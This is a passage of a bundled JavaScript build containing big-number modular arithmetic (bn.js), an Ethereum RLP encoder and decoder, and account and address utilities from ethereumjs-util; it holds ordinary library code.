    BN.prototype.lten = function lten(num) {
        return this.cmpn(num) <= 0;
    };
    BN.prototype.lte = function lte(num) {
        return this.cmp(num) <= 0;
    };
    BN.prototype.eqn = function eqn(num) {
        return this.cmpn(num) === 0;
    };
    BN.prototype.eq = function eq(num) {
        return this.cmp(num) === 0;
    };
    //
    // A reduce context, could be using montgomery or something better, depending
    // on the `m` itself.
    //
    BN.red = function red(num) {
        return new Red(num);
    };
    BN.prototype.toRed = function toRed(ctx) {
        assert(!this.red, "Already a number in reduction context");
        assert(this.negative === 0, "red works only with positives");
        return ctx.convertTo(this)._forceRed(ctx);
    };
    BN.prototype.fromRed = function fromRed() {
        assert(this.red, "fromRed works only with numbers in reduction context");
        return this.red.convertFrom(this);
    };
    BN.prototype._forceRed = function _forceRed(ctx) {
        this.red = ctx;
        return this;
    };
    BN.prototype.forceRed = function forceRed(ctx) {
        assert(!this.red, "Already a number in reduction context");
        return this._forceRed(ctx);
    };
    BN.prototype.redAdd = function redAdd(num) {
        assert(this.red, "redAdd works only with red numbers");
        return this.red.add(this, num);
    };
    BN.prototype.redIAdd = function redIAdd(num) {
        assert(this.red, "redIAdd works only with red numbers");
        return this.red.iadd(this, num);
    };
    BN.prototype.redSub = function redSub(num) {
        assert(this.red, "redSub works only with red numbers");
        return this.red.sub(this, num);
    };
    BN.prototype.redISub = function redISub(num) {
        assert(this.red, "redISub works only with red numbers");
        return this.red.isub(this, num);
    };
    BN.prototype.redShl = function redShl(num) {
        assert(this.red, "redShl works only with red numbers");
        return this.red.shl(this, num);
    };
    BN.prototype.redMul = function redMul(num) {
        assert(this.red, "redMul works only with red numbers");
        this.red._verify2(this, num);
        return this.red.mul(this, num);
    };
    BN.prototype.redIMul = function redIMul(num) {
        assert(this.red, "redMul works only with red numbers");
        this.red._verify2(this, num);
        return this.red.imul(this, num);
    };
    BN.prototype.redSqr = function redSqr() {
        assert(this.red, "redSqr works only with red numbers");
        this.red._verify1(this);
        return this.red.sqr(this);
    };
    BN.prototype.redISqr = function redISqr() {
        assert(this.red, "redISqr works only with red numbers");
        this.red._verify1(this);
        return this.red.isqr(this);
    };
    // Square root over p
    BN.prototype.redSqrt = function redSqrt() {
        assert(this.red, "redSqrt works only with red numbers");
        this.red._verify1(this);
        return this.red.sqrt(this);
    };
    BN.prototype.redInvm = function redInvm() {
        assert(this.red, "redInvm works only with red numbers");
        this.red._verify1(this);
        return this.red.invm(this);
    };
    // Return negative clone of `this` % `red modulo`
    BN.prototype.redNeg = function redNeg() {
        assert(this.red, "redNeg works only with red numbers");
        this.red._verify1(this);
        return this.red.neg(this);
    };
    BN.prototype.redPow = function redPow(num) {
        assert(this.red && !num.red, "redPow(normalNum)");
        this.red._verify1(this);
        return this.red.pow(this, num);
    };
    // Prime numbers with efficient reduction
    var primes = {
        k256: null,
        p224: null,
        p192: null,
        p25519: null
    };
    // Pseudo-Mersenne prime
    function MPrime(name, p) {
        // P = 2 ^ N - K
        this.name = name;
        this.p = new BN(p, 16);
        this.n = this.p.bitLength();
        this.k = new BN(1).iushln(this.n).isub(this.p);
        this.tmp = this._tmp();
    }
    MPrime.prototype._tmp = function _tmp() {
        var tmp = new BN(null);
        tmp.words = new Array(Math.ceil(this.n / 13));
        return tmp;
    };
    MPrime.prototype.ireduce = function ireduce(num) {
        // Assumes that `num` is less than `P^2`
        // num = HI * (2 ^ N - K) + HI * K + LO = HI * K + LO (mod P)
        var r = num;
        var rlen;
        do {
            this.split(r, this.tmp);
            r = this.imulK(r);
            r = r.iadd(this.tmp);
            rlen = r.bitLength();
        }while (rlen > this.n);
        var cmp = rlen < this.n ? -1 : r.ucmp(this.p);
        if (cmp === 0) {
            r.words[0] = 0;
            r.length = 1;
        } else if (cmp > 0) r.isub(this.p);
        else if (r.strip !== undefined) // r is a BN v4 instance
        r.strip();
        else // r is a BN v5 instance
        r._strip();
        return r;
    };
    MPrime.prototype.split = function split(input, out) {
        input.iushrn(this.n, 0, out);
    };
    MPrime.prototype.imulK = function imulK(num) {
        return num.imul(this.k);
    };
    function K256() {
        MPrime.call(this, "k256", "ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f");
    }
    inherits(K256, MPrime);
    K256.prototype.split = function split(input, output) {
        // 256 = 9 * 26 + 22
        var mask = 0x3fffff;
        var outLen = Math.min(input.length, 9);
        for(var i = 0; i < outLen; i++)output.words[i] = input.words[i];
        output.length = outLen;
        if (input.length <= 9) {
            input.words[0] = 0;
            input.length = 1;
            return;
        }
        // Shift by 9 limbs
        var prev = input.words[9];
        output.words[output.length++] = prev & mask;
        for(i = 10; i < input.length; i++){
            var next = input.words[i] | 0;
            input.words[i - 10] = (next & mask) << 4 | prev >>> 22;
            prev = next;
        }
        prev >>>= 22;
        input.words[i - 10] = prev;
        if (prev === 0 && input.length > 10) input.length -= 10;
        else input.length -= 9;
    };
    K256.prototype.imulK = function imulK(num) {
        // K = 0x1000003d1 = [ 0x40, 0x3d1 ]
        num.words[num.length] = 0;
        num.words[num.length + 1] = 0;
        num.length += 2;
        // bounded at: 0x40 * 0x3ffffff + 0x3d0 = 0x100000390
        var lo = 0;
        for(var i = 0; i < num.length; i++){
            var w = num.words[i] | 0;
            lo += w * 0x3d1;
            num.words[i] = lo & 0x3ffffff;
            lo = w * 0x40 + (lo / 0x4000000 | 0);
        }
        // Fast length reduction
        if (num.words[num.length - 1] === 0) {
            num.length--;
            if (num.words[num.length - 1] === 0) num.length--;
        }
        return num;
    };
    function P224() {
        MPrime.call(this, "p224", "ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001");
    }
    inherits(P224, MPrime);
    function P192() {
        MPrime.call(this, "p192", "ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff");
    }
    inherits(P192, MPrime);
    function P25519() {
        // 2 ^ 255 - 19
        MPrime.call(this, "25519", "7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed");
    }
    inherits(P25519, MPrime);
    P25519.prototype.imulK = function imulK(num) {
        // K = 0x13
        var carry = 0;
        for(var i = 0; i < num.length; i++){
            var hi = (num.words[i] | 0) * 0x13 + carry;
            var lo = hi & 0x3ffffff;
            hi >>>= 26;
            num.words[i] = lo;
            carry = hi;
        }
        if (carry !== 0) num.words[num.length++] = carry;
        return num;
    };
    // Exported mostly for testing purposes, use plain name instead
    BN._prime = function prime(name) {
        // Cached version of prime
        if (primes[name]) return primes[name];
        var prime;
        if (name === "k256") prime = new K256();
        else if (name === "p224") prime = new P224();
        else if (name === "p192") prime = new P192();
        else if (name === "p25519") prime = new P25519();
        else throw new Error("Unknown prime " + name);
        primes[name] = prime;
        return prime;
    };
    //
    // Base reduction engine
    //
    function Red(m) {
        if (typeof m === "string") {
            var prime = BN._prime(m);
            this.m = prime.p;
            this.prime = prime;
        } else {
            assert(m.gtn(1), "modulus must be greater than 1");
            this.m = m;
            this.prime = null;
        }
    }
    Red.prototype._verify1 = function _verify1(a) {
        assert(a.negative === 0, "red works only with positives");
        assert(a.red, "red works only with red numbers");
    };
    Red.prototype._verify2 = function _verify2(a, b) {
        assert((a.negative | b.negative) === 0, "red works only with positives");
        assert(a.red && a.red === b.red, "red works only with red numbers");
    };
    Red.prototype.imod = function imod(a) {
        if (this.prime) return this.prime.ireduce(a)._forceRed(this);
        move(a, a.umod(this.m)._forceRed(this));
        return a;
    };
    Red.prototype.neg = function neg(a) {
        if (a.isZero()) return a.clone();
        return this.m.sub(a)._forceRed(this);
    };
    Red.prototype.add = function add(a, b) {
        this._verify2(a, b);
        var res = a.add(b);
        if (res.cmp(this.m) >= 0) res.isub(this.m);
        return res._forceRed(this);
    };
    Red.prototype.iadd = function iadd(a, b) {
        this._verify2(a, b);
        var res = a.iadd(b);
        if (res.cmp(this.m) >= 0) res.isub(this.m);
        return res;
    };
    Red.prototype.sub = function sub(a, b) {
        this._verify2(a, b);
        var res = a.sub(b);
        if (res.cmpn(0) < 0) res.iadd(this.m);
        return res._forceRed(this);
    };
    Red.prototype.isub = function isub(a, b) {
        this._verify2(a, b);
        var res = a.isub(b);
        if (res.cmpn(0) < 0) res.iadd(this.m);
        return res;
    };
    Red.prototype.shl = function shl(a, num) {
        this._verify1(a);
        return this.imod(a.ushln(num));
    };
    Red.prototype.imul = function imul(a, b) {
        this._verify2(a, b);
        return this.imod(a.imul(b));
    };
    Red.prototype.mul = function mul(a, b) {
        this._verify2(a, b);
        return this.imod(a.mul(b));
    };
    Red.prototype.isqr = function isqr(a) {
        return this.imul(a, a.clone());
    };
    Red.prototype.sqr = function sqr(a) {
        return this.mul(a, a);
    };
    Red.prototype.sqrt = function sqrt(a) {
        if (a.isZero()) return a.clone();
        var mod3 = this.m.andln(3);
        assert(mod3 % 2 === 1);
        // Fast case
        if (mod3 === 3) {
            var pow = this.m.add(new BN(1)).iushrn(2);
            return this.pow(a, pow);
        }
        // Tonelli-Shanks algorithm (Totally unoptimized and slow)
        //
        // Find Q and S, that Q * 2 ^ S = (P - 1)
        var q = this.m.subn(1);
        var s = 0;
        while(!q.isZero() && q.andln(1) === 0){
            s++;
            q.iushrn(1);
        }
        assert(!q.isZero());
        var one = new BN(1).toRed(this);
        var nOne = one.redNeg();
        // Find quadratic non-residue
        // NOTE: Max is such because of generalized Riemann hypothesis.
        var lpow = this.m.subn(1).iushrn(1);
        var z = this.m.bitLength();
        z = new BN(2 * z * z).toRed(this);
        while(this.pow(z, lpow).cmp(nOne) !== 0)z.redIAdd(nOne);
        var c = this.pow(z, q);
        var r = this.pow(a, q.addn(1).iushrn(1));
        var t = this.pow(a, q);
        var m = s;
        while(t.cmp(one) !== 0){
            var tmp = t;
            for(var i = 0; tmp.cmp(one) !== 0; i++)tmp = tmp.redSqr();
            assert(i < m);
            var b = this.pow(c, new BN(1).iushln(m - i - 1));
            r = r.redMul(b);
            c = b.redSqr();
            t = t.redMul(c);
            m = i;
        }
        return r;
    };
    Red.prototype.invm = function invm(a) {
        var inv = a._invmp(this.m);
        if (inv.negative !== 0) {
            inv.negative = 0;
            return this.imod(inv).redNeg();
        } else return this.imod(inv);
    };
    Red.prototype.pow = function pow(a, num) {
        if (num.isZero()) return new BN(1).toRed(this);
        if (num.cmpn(1) === 0) return a.clone();
        var windowSize = 4;
        var wnd = new Array(1 << windowSize);
        wnd[0] = new BN(1).toRed(this);
        wnd[1] = a;
        for(var i = 2; i < wnd.length; i++)wnd[i] = this.mul(wnd[i - 1], a);
        var res = wnd[0];
        var current = 0;
        var currentLen = 0;
        var start = num.bitLength() % 26;
        if (start === 0) start = 26;
        for(i = num.length - 1; i >= 0; i--){
            var word = num.words[i];
            for(var j = start - 1; j >= 0; j--){
                var bit = word >> j & 1;
                if (res !== wnd[0]) res = this.sqr(res);
                if (bit === 0 && current === 0) {
                    currentLen = 0;
                    continue;
                }
                current <<= 1;
                current |= bit;
                currentLen++;
                if (currentLen !== windowSize && (i !== 0 || j !== 0)) continue;
                res = this.mul(res, wnd[current]);
                currentLen = 0;
                current = 0;
            }
            start = 26;
        }
        return res;
    };
    Red.prototype.convertTo = function convertTo(num) {
        var r = num.umod(this.m);
        return r === num ? r.clone() : r;
    };
    Red.prototype.convertFrom = function convertFrom(num) {
        var res = num.clone();
        res.red = null;
        return res;
    };
    //
    // Montgomery method engine
    //
    BN.mont = function mont(num) {
        return new Mont(num);
    };
    function Mont(m) {
        Red.call(this, m);
        this.shift = this.m.bitLength();
        if (this.shift % 26 !== 0) this.shift += 26 - this.shift % 26;
        this.r = new BN(1).iushln(this.shift);
        this.r2 = this.imod(this.r.sqr());
        this.rinv = this.r._invmp(this.m);
        this.minv = this.rinv.mul(this.r).isubn(1).div(this.m);
        this.minv = this.minv.umod(this.r);
        this.minv = this.r.sub(this.minv);
    }
    inherits(Mont, Red);
    Mont.prototype.convertTo = function convertTo(num) {
        return this.imod(num.ushln(this.shift));
    };
    Mont.prototype.convertFrom = function convertFrom(num) {
        var r = this.imod(num.mul(this.rinv));
        r.red = null;
        return r;
    };
    Mont.prototype.imul = function imul(a, b) {
        if (a.isZero() || b.isZero()) {
            a.words[0] = 0;
            a.length = 1;
            return a;
        }
        var t = a.imul(b);
        var c = t.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m);
        var u = t.isub(c).iushrn(this.shift);
        var res = u;
        if (u.cmp(this.m) >= 0) res = u.isub(this.m);
        else if (u.cmpn(0) < 0) res = u.iadd(this.m);
        return res._forceRed(this);
    };
    Mont.prototype.mul = function mul(a, b) {
        if (a.isZero() || b.isZero()) return new BN(0)._forceRed(this);
        var t = a.mul(b);
        var c = t.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m);
        var u = t.isub(c).iushrn(this.shift);
        var res = u;
        if (u.cmp(this.m) >= 0) res = u.isub(this.m);
        else if (u.cmpn(0) < 0) res = u.iadd(this.m);
        return res._forceRed(this);
    };
    Mont.prototype.invm = function invm(a) {
        // (AR)^-1 * R^2 = (A^-1 * R^-1) * R^2 = A^-1 * R
        var res = this.imod(a._invmp(this.m).mul(this.r2));
        return res._forceRed(this);
    };
})(module, this);

});
parcelRequire.register("kjyEk", function(module, exports) {
"use strict";

});


parcelRequire.register("jAvDX", function(module, exports) {

var $6ZWSX = parcelRequire("6ZWSX");
var $e429ecd626b613e0$require$Buffer = $6ZWSX.Buffer;
"use strict";
var $e429ecd626b613e0$var$__importDefault = module.exports && module.exports.__importDefault || function(mod) {
    return mod && mod.__esModule ? mod : {
        "default": mod
    };
};
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.getLength = module.exports.decode = module.exports.encode = void 0;

var $e429ecd626b613e0$var$bn_js_1 = $e429ecd626b613e0$var$__importDefault((parcelRequire("dEXSZ")));
/**
 * RLP Encoding based on: https://github.com/ethereum/wiki/wiki/%5BEnglish%5D-RLP
 * This function takes in a data, convert it to buffer if not, and a length for recursion
 * @param input - will be converted to buffer
 * @returns returns buffer of encoded data
 **/ function $e429ecd626b613e0$var$encode(input) {
    if (Array.isArray(input)) {
        var output = [];
        for(var i = 0; i < input.length; i++)output.push($e429ecd626b613e0$var$encode(input[i]));
        var buf = $e429ecd626b613e0$require$Buffer.concat(output);
        return $e429ecd626b613e0$require$Buffer.concat([
            $e429ecd626b613e0$var$encodeLength(buf.length, 192),
            buf
        ]);
    } else {
        var inputBuf = $e429ecd626b613e0$var$toBuffer(input);
        return inputBuf.length === 1 && inputBuf[0] < 128 ? inputBuf : $e429ecd626b613e0$require$Buffer.concat([
            $e429ecd626b613e0$var$encodeLength(inputBuf.length, 128),
            inputBuf
        ]);
    }
}
module.exports.encode = $e429ecd626b613e0$var$encode;
/**
 * Parse integers. Check if there is no leading zeros
 * @param v The value to parse
 * @param base The base to parse the integer into
 */ function $e429ecd626b613e0$var$safeParseInt(v, base) {
    if (v[0] === "0" && v[1] === "0") throw new Error("invalid RLP: extra zeros");
    return parseInt(v, base);
}
function $e429ecd626b613e0$var$encodeLength(len, offset) {
    if (len < 56) return $e429ecd626b613e0$require$Buffer.from([
        len + offset
    ]);
    else {
        var hexLength = $e429ecd626b613e0$var$intToHex(len);
        var lLength = hexLength.length / 2;
        var firstByte = $e429ecd626b613e0$var$intToHex(offset + 55 + lLength);
        return $e429ecd626b613e0$require$Buffer.from(firstByte + hexLength, "hex");
    }
}
function $e429ecd626b613e0$var$decode(input, stream) {
    if (stream === void 0) stream = false;
    if (!input || input.length === 0) return $e429ecd626b613e0$require$Buffer.from([]);
    var inputBuffer = $e429ecd626b613e0$var$toBuffer(input);
    var decoded = $e429ecd626b613e0$var$_decode(inputBuffer);
    if (stream) return decoded;
    if (decoded.remainder.length !== 0) throw new Error("invalid remainder");
    return decoded.data;
}
module.exports.decode = $e429ecd626b613e0$var$decode;
/**
 * Get the length of the RLP input
 * @param input
 * @returns The length of the input or an empty Buffer if no input
 */ function $e429ecd626b613e0$var$getLength(input) {
    if (!input || input.length === 0) return $e429ecd626b613e0$require$Buffer.from([]);
    var inputBuffer = $e429ecd626b613e0$var$toBuffer(input);
    var firstByte = inputBuffer[0];
    if (firstByte <= 0x7f) return inputBuffer.length;
    else if (firstByte <= 0xb7) return firstByte - 0x7f;
    else if (firstByte <= 0xbf) return firstByte - 0xb6;
    else if (firstByte <= 0xf7) // a list between  0-55 bytes long
    return firstByte - 0xbf;
    else {
        // a list  over 55 bytes long
        var llength = firstByte - 0xf6;
        var length_1 = $e429ecd626b613e0$var$safeParseInt(inputBuffer.slice(1, llength).toString("hex"), 16);
        return llength + length_1;
    }
}
module.exports.getLength = $e429ecd626b613e0$var$getLength;
/** Decode an input with RLP */ function $e429ecd626b613e0$var$_decode(input) {
    var length, llength, data, innerRemainder, d;
    var decoded = [];
    var firstByte = input[0];
    if (firstByte <= 0x7f) // a single byte whose value is in the [0x00, 0x7f] range, that byte is its own RLP encoding.
    return {
        data: input.slice(0, 1),
        remainder: input.slice(1)
    };
    else if (firstByte <= 0xb7) {
        // string is 0-55 bytes long. A single byte with value 0x80 plus the length of the string followed by the string
        // The range of the first byte is [0x80, 0xb7]
        length = firstByte - 0x7f;
        // set 0x80 null to 0
        if (firstByte === 0x80) data = $e429ecd626b613e0$require$Buffer.from([]);
        else data = input.slice(1, length);
        if (length === 2 && data[0] < 0x80) throw new Error("invalid rlp encoding: byte must be less 0x80");
        return {
            data: data,
            remainder: input.slice(length)
        };
    } else if (firstByte <= 0xbf) {
        // string is greater than 55 bytes long. A single byte with the value (0xb7 plus the length of the length),
        // followed by the length, followed by the string
        llength = firstByte - 0xb6;
        if (input.length - 1 < llength) throw new Error("invalid RLP: not enough bytes for string length");
        length = $e429ecd626b613e0$var$safeParseInt(input.slice(1, llength).toString("hex"), 16);
        if (length <= 55) throw new Error("invalid RLP: expected string length to be greater than 55");
        data = input.slice(llength, length + llength);
        if (data.length < length) throw new Error("invalid RLP: not enough bytes for string");
        return {
            data: data,
            remainder: input.slice(length + llength)
        };
    } else if (firstByte <= 0xf7) {
        // a list between  0-55 bytes long
        length = firstByte - 0xbf;
        innerRemainder = input.slice(1, length);
        while(innerRemainder.length){
            d = $e429ecd626b613e0$var$_decode(innerRemainder);
            decoded.push(d.data);
            innerRemainder = d.remainder;
        }
        return {
            data: decoded,
            remainder: input.slice(length)
        };
    } else {
        // a list  over 55 bytes long
        llength = firstByte - 0xf6;
        length = $e429ecd626b613e0$var$safeParseInt(input.slice(1, llength).toString("hex"), 16);
        var totalLength = llength + length;
        if (totalLength > input.length) throw new Error("invalid rlp: total length is larger than the data");
        innerRemainder = input.slice(llength, totalLength);
        if (innerRemainder.length === 0) throw new Error("invalid rlp, List has a invalid length");
        while(innerRemainder.length){
            d = $e429ecd626b613e0$var$_decode(innerRemainder);
            decoded.push(d.data);
            innerRemainder = d.remainder;
        }
        return {
            data: decoded,
            remainder: input.slice(totalLength)
        };
    }
}
/** Check if a string is prefixed by 0x */ function $e429ecd626b613e0$var$isHexPrefixed(str) {
    return str.slice(0, 2) === "0x";
}
/** Removes 0x from a given String */ function $e429ecd626b613e0$var$stripHexPrefix(str) {
    if (typeof str !== "string") return str;
    return $e429ecd626b613e0$var$isHexPrefixed(str) ? str.slice(2) : str;
}
/** Transform an integer into its hexadecimal value */ function $e429ecd626b613e0$var$intToHex(integer) {
    if (integer < 0) throw new Error("Invalid integer as argument, must be unsigned!");
    var hex = integer.toString(16);
    return hex.length % 2 ? "0" + hex : hex;
}
/** Pad a string to be even */ function $e429ecd626b613e0$var$padToEven(a) {
    return a.length % 2 ? "0" + a : a;
}
/** Transform an integer into a Buffer */ function $e429ecd626b613e0$var$intToBuffer(integer) {
    var hex = $e429ecd626b613e0$var$intToHex(integer);
    return $e429ecd626b613e0$require$Buffer.from(hex, "hex");
}
/** Transform anything into a Buffer */ function $e429ecd626b613e0$var$toBuffer(v) {
    if (!$e429ecd626b613e0$require$Buffer.isBuffer(v)) {
        if (typeof v === "string") {
            if ($e429ecd626b613e0$var$isHexPrefixed(v)) return $e429ecd626b613e0$require$Buffer.from($e429ecd626b613e0$var$padToEven($e429ecd626b613e0$var$stripHexPrefix(v)), "hex");
            else return $e429ecd626b613e0$require$Buffer.from(v);
        } else if (typeof v === "number" || typeof v === "bigint") {
            if (!v) return $e429ecd626b613e0$require$Buffer.from([]);
            else return $e429ecd626b613e0$var$intToBuffer(v);
        } else if (v === null || v === undefined) return $e429ecd626b613e0$require$Buffer.from([]);
        else if (v instanceof Uint8Array) return $e429ecd626b613e0$require$Buffer.from(v);
        else if ($e429ecd626b613e0$var$bn_js_1.default.isBN(v)) // converts a BN to a Buffer
        return $e429ecd626b613e0$require$Buffer.from(v.toArray());
        else throw new Error("invalid type");
    }
    return v;
}

});



parcelRequire.register("idiNS", function(module, exports) {

var $6ZWSX = parcelRequire("6ZWSX");
var $d42806dba2e311ba$require$Buffer = $6ZWSX.Buffer;
"use strict";
var $d42806dba2e311ba$var$__read = module.exports && module.exports.__read || function(o, n) {
    var m = typeof Symbol === "function" && o[Symbol.iterator];
    if (!m) return o;
    var i = m.call(o), r, ar = [], e;
    try {
        while((n === void 0 || n-- > 0) && !(r = i.next()).done)ar.push(r.value);
    } catch (error) {
        e = {
            error: error
        };
    } finally{
        try {
            if (r && !r.done && (m = i["return"])) m.call(i);
        } finally{
            if (e) throw e.error;
        }
    }
    return ar;
};
var $d42806dba2e311ba$var$__importDefault = module.exports && module.exports.__importDefault || function(mod) {
    return mod && mod.__esModule ? mod : {
        "default": mod
    };
};
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.isZeroAddress = module.exports.zeroAddress = module.exports.importPublic = module.exports.privateToAddress = module.exports.privateToPublic = module.exports.publicToAddress = module.exports.pubToAddress = module.exports.isValidPublic = module.exports.isValidPrivate = module.exports.generateAddress2 = module.exports.generateAddress = module.exports.isValidChecksumAddress = module.exports.toChecksumAddress = module.exports.isValidAddress = module.exports.Account = void 0;

var $d42806dba2e311ba$var$assert_1 = $d42806dba2e311ba$var$__importDefault((parcelRequire("aLUwE")));

var $4jhio = parcelRequire("4jhio");

var $dXQCW = parcelRequire("dXQCW");

var $aj8Qm = parcelRequire("aj8Qm");

var $5jI7y = parcelRequire("5jI7y");

var $b61lJ = parcelRequire("b61lJ");

var $gKSHR = parcelRequire("gKSHR");

var $7jIKp = parcelRequire("7jIKp");

var $eLj8Y = parcelRequire("eLj8Y");
var $d42806dba2e311ba$var$Account = /** @class */ function() {
    /**
     * This constructor assigns and validates the values.
     * Use the static factory methods to assist in creating an Account from varying data types.
     */ function Account(nonce, balance, stateRoot, codeHash) {
        if (nonce === void 0) nonce = new $4jhio.BN(0);
        if (balance === void 0) balance = new $4jhio.BN(0);
        if (stateRoot === void 0) stateRoot = $5jI7y.KECCAK256_RLP;
        if (codeHash === void 0) codeHash = $5jI7y.KECCAK256_NULL;
        this.nonce = nonce;
        this.balance = balance;
        this.stateRoot = stateRoot;
        this.codeHash = codeHash;
        this._validate();
    }
    Account.fromAccountData = function(accountData) {
        var nonce = accountData.nonce, balance = accountData.balance, stateRoot = accountData.stateRoot, codeHash = accountData.codeHash;
        return new Account(nonce ? new $4jhio.BN((0, $b61lJ.toBuffer)(nonce)) : undefined, balance ? new $4jhio.BN((0, $b61lJ.toBuffer)(balance)) : undefined, stateRoot ? (0, $b61lJ.toBuffer)(stateRoot) : undefined, codeHash ? (0, $b61lJ.toBuffer)(codeHash) : undefined);
    };
    Account.fromRlpSerializedAccount = function(serialized) {
        var values = $4jhio.rlp.decode(serialized);
        if (!Array.isArray(values)) throw new Error("Invalid serialized account input. Must be array");
        return this.fromValuesArray(values);
    };
    Account.fromValuesArray = function(values) {
        var _a = $d42806dba2e311ba$var$__read(values, 4), nonce = _a[0], balance = _a[1], stateRoot = _a[2], codeHash = _a[3];
        return new Account(new $4jhio.BN(nonce), new $4jhio.BN(balance), stateRoot, codeHash);
    };
    Account.prototype._validate = function() {
        if (this.nonce.lt(new $4jhio.BN(0))) throw new Error("nonce must be greater than zero");
        if (this.balance.lt(new $4jhio.BN(0))) throw new Error("balance must be greater than zero");
        if (this.stateRoot.length !== 32) throw new Error("stateRoot must have a length of 32");
        if (this.codeHash.length !== 32) throw new Error("codeHash must have a length of 32");
    };
    /**
     * Returns a Buffer Array of the raw Buffers for the account, in order.
     */ Account.prototype.raw = function() {
        return [
            (0, $eLj8Y.bnToUnpaddedBuffer)(this.nonce),
            (0, $eLj8Y.bnToUnpaddedBuffer)(this.balance),
            this.stateRoot,
            this.codeHash
        ];
    };
    /**
     * Returns the RLP serialization of the account as a `Buffer`.
     */ Account.prototype.serialize = function() {
        return $4jhio.rlp.encode(this.raw());
    };
    /**
     * Returns a `Boolean` determining if the account is a contract.
     */ Account.prototype.isContract = function() {
        return !this.codeHash.equals($5jI7y.KECCAK256_NULL);
    };
    /**
     * Returns a `Boolean` determining if the account is empty complying to the definition of
     * account emptiness in [EIP-161](https://eips.ethereum.org/EIPS/eip-161):
     * "An account is considered empty when it has no code and zero nonce and zero balance."
     */ Account.prototype.isEmpty = function() {
        return this.balance.isZero() && this.nonce.isZero() && this.codeHash.equals($5jI7y.KECCAK256_NULL);
    };
    return Account;
}();
module.exports.Account = $d42806dba2e311ba$var$Account;
/**
 * Checks if the address is a valid. Accepts checksummed addresses too.
 */ var $d42806dba2e311ba$var$isValidAddress = function(hexAddress) {
    try {
        (0, $7jIKp.assertIsString)(hexAddress);
    } catch (e) {
        return false;
    }
    return /^0x[0-9a-fA-F]{40}$/.test(hexAddress);
};
module.exports.isValidAddress = $d42806dba2e311ba$var$isValidAddress;
/**
 * Returns a checksummed address.
 *
 * If an eip1191ChainId is provided, the chainId will be included in the checksum calculation. This
 * has the effect of checksummed addresses for one chain having invalid checksums for others.
 * For more details see [EIP-1191](https://eips.ethereum.org/EIPS/eip-1191).
 *
 * WARNING: Checksums with and without the chainId will differ and the EIP-1191 checksum is not
 * backwards compatible to the original widely adopted checksum format standard introduced in
 * [EIP-55](https://eips.ethereum.org/EIPS/eip-55), so this will break in existing applications.
 * Usage of this EIP is therefore discouraged unless you have a very targeted use case.
 */ var $d42806dba2e311ba$var$toChecksumAddress = function(hexAddress, eip1191ChainId) {
    (0, $7jIKp.assertIsHexString)(hexAddress);
    var address = (0, $aj8Qm.stripHexPrefix)(hexAddress).toLowerCase();
    var prefix = "";
    if (eip1191ChainId) {
        var chainId = (0, $eLj8Y.toType)(eip1191ChainId, $eLj8Y.TypeOutput.BN);
        prefix = chainId.toString() + "0x";
    }
    var hash = (0, $gKSHR.keccakFromString)(prefix + address).toString("hex");
    var ret = "0x";
    for(var i = 0; i < address.length; i++)if (parseInt(hash[i], 16) >= 8) ret += address[i].toUpperCase();
    else ret += address[i];
    return ret;
};
module.exports.toChecksumAddress = $d42806dba2e311ba$var$toChecksumAddress;
/**
 * Checks if the address is a valid checksummed address.
 *
 * See toChecksumAddress' documentation for details about the eip1191ChainId parameter.
 */ var $d42806dba2e311ba$var$isValidChecksumAddress = function(hexAddress, eip1191ChainId) {
    return (0, module.exports.isValidAddress)(hexAddress) && (0, module.exports.toChecksumAddress)(hexAddress, eip1191ChainId) === hexAddress;
};
module.exports.isValidChecksumAddress = $d42806dba2e311ba$var$isValidChecksumAddress;
/**
 * Generates an address of a newly created contract.
 * @param from The address which is creating this new address
 * @param nonce The nonce of the from account
 */ var $d42806dba2e311ba$var$generateAddress = function(from, nonce) {
    (0, $7jIKp.assertIsBuffer)(from);
    (0, $7jIKp.assertIsBuffer)(nonce);
    var nonceBN = new $4jhio.BN(nonce);
    if (nonceBN.isZero()) // in RLP we want to encode null in the case of zero nonce
    // read the RLP documentation for an answer if you dare
    return (0, $gKSHR.rlphash)([
        from,
        null
    ]).slice(-20);
    // Only take the lower 160bits of the hash
    return (0, $gKSHR.rlphash)([
        from,
        $d42806dba2e311ba$require$Buffer.from(nonceBN.toArray())
    ]).slice(-20);
};
module.exports.generateAddress = $d42806dba2e311ba$var$generateAddress;
/**
 * Generates an address for a contract created using CREATE2.
 * @param from The address which is creating this new address
 * @param salt A salt
 * @param initCode The init code of the contract being created
 */ var $d42806dba2e311ba$var$generateAddress2 = function(from, salt, initCode) {
    (0, $7jIKp.assertIsBuffer)(from);
    (0, $7jIKp.assertIsBuffer)(salt);
    (0, $7jIKp.assertIsBuffer)(initCode);
    (0, $d42806dba2e311ba$var$assert_1.default)(from.length === 20);
    (0, $d42806dba2e311ba$var$assert_1.default)(salt.length === 32);
    var address = (0, $gKSHR.keccak256)($d42806dba2e311ba$require$Buffer.concat([
        $d42806dba2e311ba$require$Buffer.from("ff", "hex"),
        from,
        salt,
        (0, $gKSHR.keccak256)(initCode)
    ]));
    return address.slice(-20);
};
module.exports.generateAddress2 = $d42806dba2e311ba$var$generateAddress2;
/**
 * Checks if the private key satisfies the rules of the curve secp256k1.
 */ var $d42806dba2e311ba$var$isValidPrivate = function(privateKey) {
    return (0, $dXQCW.privateKeyVerify)(privateKey);
};
module.exports.isValidPrivate = $d42806dba2e311ba$var$isValidPrivate;
/**
 * Checks if the public key satisfies the rules of the curve secp256k1
 * and the requirements of Ethereum.
 * @param publicKey The two points of an uncompressed key, unless sanitize is enabled
 * @param sanitize Accept public keys in other formats
 */ var $d42806dba2e311ba$var$isValidPublic = function(publicKey, sanitize) {
    if (sanitize === void 0) sanitize = false;
    (0, $7jIKp.assertIsBuffer)(publicKey);
    if (publicKey.length === 64) // Convert to SEC1 for secp256k1
    return (0, $dXQCW.publicKeyVerify)($d42806dba2e311ba$require$Buffer.concat([
        $d42806dba2e311ba$require$Buffer.from([
            4
        ]),
        publicKey
    ]));
    if (!sanitize) return false;
    return (0, $dXQCW.publicKeyVerify)(publicKey);
};
module.exports.isValidPublic = $d42806dba2e311ba$var$isValidPublic;
/**
 * Returns the ethereum address of a given public key.
